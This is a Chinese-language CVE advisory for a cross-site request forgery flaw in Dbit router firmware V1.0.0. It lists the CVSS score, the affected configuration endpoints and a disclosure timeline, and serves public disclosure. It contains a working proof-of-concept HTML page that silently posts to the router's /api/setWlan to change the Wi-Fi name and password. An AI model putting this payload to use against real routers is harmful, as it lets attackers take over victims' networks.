CVE ID: CVE-2026-36956 日期: 2026-04-29 发现者: Kirubel Solomne 厂商: 深圳市迪比特网络设备有限公司 产品: Dbit 路由器 固件版本: V1.0.0 CWE: CWE-352 - 跨站请求伪造(CSRF)
Dbit 路由器固件 V1.0.0 未在管理 API 端点上实施 CSRF 防护机制,例如反 CSRF 令牌或严格的 Origin/Referer 校验。攻击者可以构造一个恶意网页,向配置端点发送伪造的 HTTP 请求。如果已认证的管理员访问该恶意页面,路由器会将伪造请求当作合法的管理操作进行处理。
CVSS v3.1 评分:8.8(高危)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| 指标 | 值 |
|---|
| 攻击向量 | 网络 |
| 攻击复杂度 | 低 |
| 所需权限 | 无 |
| 用户交互 | 需要 |
| 机密性影响 | 高 |
| 完整性影响 | 高 |
| 可用性影响 | 高 |
| 端点 | 功能 |
|---|---|
/api/setWlan | 无线网络配置(SSID、密码) |
/api/setWan | WAN 配置 |
/api/setSystem | 系统配置 |
将以下内容保存为 poc.html,并在管理员已登录路由器时打开该文件:
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
预期行为: 由于 CSRF 令牌不匹配,请求应被拒绝。 实际行为: 路由器接受并处理伪造请求。
| 日期 | 事件 |
|---|---|
| 2026-04-29 | 发现漏洞 |
| 2026-04-29 | 上报至 MITRE |
| 2026-04-29 | 分配 CVE-2026-36956 |
| 2026-04-29 | 公开披露 |